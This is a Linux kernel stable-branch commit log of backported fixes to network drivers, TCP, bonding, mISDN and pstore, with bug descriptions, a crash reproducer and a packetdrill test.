      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      1d4353bd
    • Jack Morgenstein's avatar
      net/mlx4_core: Allow resetting VF admin mac to zero · afe6ced9
      Jack Morgenstein authored
      commit 6e522422 upstream.
      
      The VF administrative mac addresses (stored in the PF driver) are
      initialized to zero when the PF driver starts up.
      
      These addresses may be modified in the PF driver through ndo calls
      initiated by iproute2 or libvirt.
      
      While we allow the PF/host to change the VF admin mac address from zero
      to a valid unicast mac, we do not allow restoring the VF admin mac to
      zero. We currently only allow changing this mac to a different unicast mac.
      
      This leads to problems when libvirt scripts are used to deal with
      VF mac addresses, and libvirt attempts to revoke the mac so this
      host will not use it anymore.
      
      Fix this by allowing resetting a VF administrative MAC back to zero.
      
      Fixes: 8f7ba3ca ('net/mlx4: Add set VF mac address support')
      Signed-off-by: default avatarJack Morgenstein <jackm@dev.mellanox.co.il>
      Reported-by: default avatarMoshe Levi <moshele@mellanox.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarJuerg Haefliger <juerg.haefliger@hpe.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      afe6ced9
    • Liu ShuoX's avatar
      pstore: Fix buffer overflow while write offset equal to buffer size · 3a8930fd
      Liu ShuoX authored
      commit 017321cf upstream.
      
      In case new offset is equal to prz->buffer_size, it won't wrap at this
      time and will return old(overflow) value next time.
      Signed-off-by: default avatarLiu ShuoX <shuox.liu@intel.com>
      Acked-by: default avatarKees Cook <keescook@chromium.org>
      Signed-off-by: default avatarTony Luck <tony.luck@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3a8930fd
    • Arend Van Spriel's avatar
      brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() · ec38771b
      Arend Van Spriel authored
      commit ded89912 upstream.
      
      User-space can choose to omit NL80211_ATTR_SSID and only provide raw
      IE TLV data. When doing so it can provide SSID IE with length exceeding
      the allowed size. The driver further processes this IE copying it
      into a local variable without checking the length. Hence stack can be
      corrupted and used as exploit.
      Reported-by: default avatarDaxing Guo <freener.gdx@gmail.com>
      Reviewed-by: default avatarHante Meuleman <hante.meuleman@broadcom.com>
      Reviewed-by: default avatarPieter-Paul Giesberts <pieter-paul.giesberts@broadcom.com>
      Reviewed-by: default avatarFranky Lin <franky.lin@broadcom.com>
      Signed-off-by: default avatarArend van Spriel <arend.vanspriel@broadcom.com>
      Signed-off-by: default avatarKalle Valo <kvalo@codeaurora.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      ec38771b
    • Florian Fainelli's avatar
      brcmsmac: Initialize power in brcms_c_stf_ss_algo_channel_get() · 3e56d985
      Florian Fainelli authored
      commit f823a2aa upstream.
      
      wlc_phy_txpower_get_current() does a logical OR of power->flags, which
      presumes that power.flags was initiliazed earlier by the caller,
      unfortunately, this is not the case, so make sure we zero out the struct
      tx_power before calling into wlc_phy_txpower_get_current().
      
      Reported-by: coverity (CID 146011)
      Fixes: 5b435de0 ("net: wireless: add brcm80211 drivers")
      Signed-off-by: default avatarFlorian Fainelli <f.fainelli@gmail.com>
      Acked-by: default avatarArend van Spriel <arend.vanspriel@broadcom.com>
      Signed-off-by: default avatarKalle Valo <kvalo@codeaurora.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3e56d985
    • Florian Fainelli's avatar
      brcmsmac: Free packet if dma_mapping_error() fails in dma_rxfill · 5e26453d
      Florian Fainelli authored
      commit 5c5fa1f4 upstream.
      
      In case dma_mapping_error() returns an error in dma_rxfill, we would be
      leaking a packet that we allocated with brcmu_pkt_buf_get_skb().
      
      Reported-by: coverity (CID 1081819)
      Fixes: 67d0cf50 ("brcmsmac: Fix WARNING caused by lack of calls to dma_mapping_error()")
      Signed-off-by: default avatarFlorian Fainelli <f.fainelli@gmail.com>
      Acked-by: default avatarArend van Spriel <arend@broadcom.com>
      Signed-off-by: default avatarKalle Valo <kvalo@codeaurora.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      5e26453d
    • Chuck Lever's avatar
      svc: Avoid garbage replies when pc_func() returns rpc_drop_reply · 824c2230
      Chuck Lever authored
      commit 0533b130 upstream.
      
      If an RPC program does not set vs_dispatch and pc_func() returns
      rpc_drop_reply, the server sends a reply anyway containing a single
      word containing the value RPC_DROP_REPLY (in network byte-order, of
      course). This is a nonsense RPC message.
      
      Fixes: 9e701c61 ("svcrpc: simpler request dropping")
      Signed-off-by: default avatarChuck Lever <chuck.lever@oracle.com>
      Tested-by: default avatarSteve Wise <swise@opengridcomputing.com>
      Signed-off-by: default avatarAnna Schumaker <Anna.Schumaker@Netapp.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      824c2230
    • Sara Sharon's avatar
      iwlwifi: pcie: fix access to scratch buffer · 8d83a538
      Sara Sharon authored
      commit d5d0689a upstream.
      
      This fixes a pretty ancient bug that hasn't manifested itself
      until now.
      The scratchbuf for command queue is allocated only for 32 slots
      but is accessed with the queue write pointer - which can be
      up to 256.
      Since the scratch buf size was 16 and there are up to 256 TFDs
      we never passed a page boundary when accessing the scratch buffer,
      but when attempting to increase the size of the scratch buffer a
      panic was quick to follow when trying to access the address resulted
      in a page boundary.
      Signed-off-by: default avatarSara Sharon <sara.sharon@intel.com>
      Fixes: 38c0f334 ("iwlwifi: use coherent DMA memory for command header")
      Signed-off-by: default avatarLuca Coelho <luciano.coelho@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      8d83a538
    • Michal Kubecek's avatar
      ipvs: count pre-established TCP states as active · d53b6609
      Michal Kubecek authored
      commit be2cef49 upstream.
      
      Some users observed that "least connection" distribution algorithm doesn't
      handle well bursts of TCP connections from reconnecting clients after
      a node or network failure.
      
      This is because the algorithm counts active connection as worth 256
      inactive ones where for TCP, "active" only means TCP connections in
      ESTABLISHED state. In case of a connection burst, new connections are
      handled before previous ones have finished the three way handshaking so
      that all are still counted as "inactive", i.e. cheap ones. The become
      "active" quickly but at that time, all of them are already assigned to one
      real server (or few), resulting in highly unbalanced distribution.
      
      Address this by counting the "pre-established" states as "active".
      Signed-off-by: default avatarMichal Kubecek <mkubecek@suse.cz>
      Acked-by: default avatarJulian Anastasov <ja@ssi.bg>
      Signed-off-by: default avatarSimon Horman <horms@verge.net.au>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      d53b6609
    • Michal Kubecek's avatar
      net: disable fragment reassembly if high_thresh is set to zero · 5a0b77dc
      Michal Kubecek authored
      commit 30759219 upstream.
      
      Before commit 6d7b857d ("net: use lib/percpu_counter API for
      fragmentation mem accounting"), setting high threshold to 0 prevented
      fragment reassembly as first fragment would be always evicted before
      second could be added to the queue. While inefficient, some users
      apparently relied on it.
      
      Since the commit mentioned above, a percpu counter is used for
      reassembly memory accounting and high batch size avoids taking slow path
      in most common scenarios. As a result, a whole full sized packet can be
      reassembled without the percpu counter's main counter changing its
      value so that even with high_thresh set to 0, fragmented packets can be
      still reassembled and processed.
      
      Add explicit checks preventing reassembly if high threshold is zero.
      
      [mk] backport to 3.12
      Signed-off-by: default avatarMichal Kubecek <mkubecek@suse.cz>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      5a0b77dc
    • Emrah Demir's avatar
      mISDN: Fixing missing validation in base_sock_bind() · eec89a77
      Emrah Demir authored
      commit b8216468 upstream.
      
      Add validation code into mISDN/socket.c
      Signed-off-by: default avatarEmrah Demir <ed@abdsec.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      eec89a77
    • Maciej S. Szmigiero's avatar
      mISDN: Support DR6 indication in mISDNipac driver · 54fbda50
      Maciej S. Szmigiero authored
      commit 1e1589ad upstream.
      
      According to figure 39 in PEB3086 data sheet, version 1.4 this indication
      replaces DR when layer 1 transition source state is F6.
      
      This fixes mISDN layer 1 getting stuck in F6 state in TE mode on
      Dialogic Diva 2.02 card (and possibly others) when NT deactivates it.
      Signed-off-by: default avatarMaciej S. Szmigiero <mail@maciej.szmigiero.name>
      Acked-by: default avatarKarsten Keil <keil@b1-systems.de>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      54fbda50
    • Konstantin Khlebnikov's avatar
      net: ratelimit warnings about dst entry refcount underflow or overflow · 49c201c1
      Konstantin Khlebnikov authored
      commit 8bf4ada2 upstream.
      
      Kernel generates a lot of warnings when dst entry reference counter
      overflows and becomes negative. That bug was seen several times at
      machines with outdated 3.10.y kernels. Most like it's already fixed
      in upstream. Anyway that flood completely kills machine and makes
      further debugging impossible.
      Signed-off-by: default avatarKonstantin Khlebnikov <khlebnikov@yandex-team.ru>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      49c201c1
    • Mahesh Bandewar's avatar
      bonding: Fix bonding crash · 745db354
      Mahesh Bandewar authored
      commit 24b27fc4 upstream.
      
      Following few steps will crash kernel -
      
        (a) Create bonding master
            > modprobe bonding miimon=50
        (b) Create macvlan bridge on eth2
            > ip link add link eth2 dev mvl0 address aa:0:0:0:0:01 \
      	   type macvlan
        (c) Now try adding eth2 into the bond
            > echo +eth2 > /sys/class/net/bond0/bonding/slaves
            <crash>
      
      Bonding does lots of things before checking if the device enslaved is
      busy or not.
      
      In this case when the notifier call-chain sends notifications, the
      bond_netdev_event() assumes that the rx_handler /rx_handler_data is
      registered while the bond_enslave() hasn't progressed far enough to
      register rx_handler for the new slave.
      
      This patch adds a rx_handler check that can be performed right at the
      beginning of the enslave code to avoid getting into this situation.
      Signed-off-by: default avatarMahesh Bandewar <maheshb@google.com>
      Acked-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      745db354
    • Eric Dumazet's avatar
      tcp: take care of truncations done by sk_filter() · 56325d9f
      Eric Dumazet authored
      commit ac6e7800 upstream.
      
      With syzkaller help, Marco Grassi found a bug in TCP stack,
      crashing in tcp_collapse()
      
      Root cause is that sk_filter() can truncate the incoming skb,
      but TCP stack was not really expecting this to happen.
      It probably was expecting a simple DROP or ACCEPT behavior.
      
      We first need to make sure no part of TCP header could be removed.
      Then we need to adjust TCP_SKB_CB(skb)->end_seq
      
      Many thanks to syzkaller team and Marco for giving us a reproducer.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Reported-by: default avatarMarco Grassi <marco.gra@gmail.com>
      Reported-by: default avatarVladis Dronov <vdronov@redhat.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      56325d9f
    • Douglas Caetano dos Santos's avatar
      tcp: fix wrong checksum calculation on MTU probing · d318f82f
      Douglas Caetano dos Santos authored
      commit 2fe664f1 upstream.
      
      With TCP MTU probing enabled and offload TX checksumming disabled,
      tcp_mtu_probe() calculated the wrong checksum when a fragment being copied
      into the probe's SKB had an odd length. This was caused by the direct use
      of skb_copy_and_csum_bits() to calculate the checksum, as it pads the
      fragment being copied, if needed. When this fragment was not the last, a
      subsequent call used the previous checksum without considering this
      padding.
      
      The effect was a stale connection in one way, as even retransmissions
      wouldn't solve the problem, because the checksum was never recalculated for
      the full SKB length.
      Signed-off-by: default avatarDouglas Caetano dos Santos <douglascs@taghos.com.br>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      d318f82f
    • Eric Dumazet's avatar
      tcp: fix overflow in __tcp_retransmit_skb() · 93522d31
      Eric Dumazet authored
      commit ffb4d6c8 upstream.
      
      If a TCP socket gets a large write queue, an overflow can happen
      in a test in __tcp_retransmit_skb() preventing all retransmits.
      
      The flow then stalls and resets after timeouts.
      
      Tested:
      
      sysctl -w net.core.wmem_max=1000000000
      netperf -H dest -- -s 1000000000
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      93522d31
    • Eric Dumazet's avatar
      tcp: properly scale window in tcp_v[46]_reqsk_send_ack() · 1c50d3ae
      Eric Dumazet authored
      commit 20a2b49f upstream.
      
      When sending an ack in SYN_RECV state, we must scale the offered
      window if wscale option was negotiated and accepted.
      
      Tested:
       Following packetdrill test demonstrates the issue :
      
      0.000 socket(..., SOCK_STREAM, IPPROTO_TCP) = 3
      +0 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
      
      +0 bind(3, ..., ...) = 0
      +0 listen(3, 1) = 0
      
      // Establish a connection.
      +0 < S 0:0(0) win 20000 <mss 1000,sackOK,wscale 7, nop, TS val 100 ecr 0>
      +0 > S. 0:0(0) ack 1 win 28960 <mss 1460,sackOK, TS val 100 ecr 100, nop, wscale 7>
      
      +0 < . 1:11(10) ack 1 win 156 <nop,nop,TS val 99 ecr 100>
      // check that window is properly scaled !
      +0 > . 1:1(0) ack 1 win 226 <nop,nop,TS val 200 ecr 100>
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Cc: Yuchung Cheng <ycheng@google.com>
      Cc: Neal Cardwell <ncardwell@google.com>
      Acked-by: default avatarYuchung Cheng <ycheng@google.com>
      Acked-by: default avatarNeal Cardwell <ncardwell@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      1c50d3ae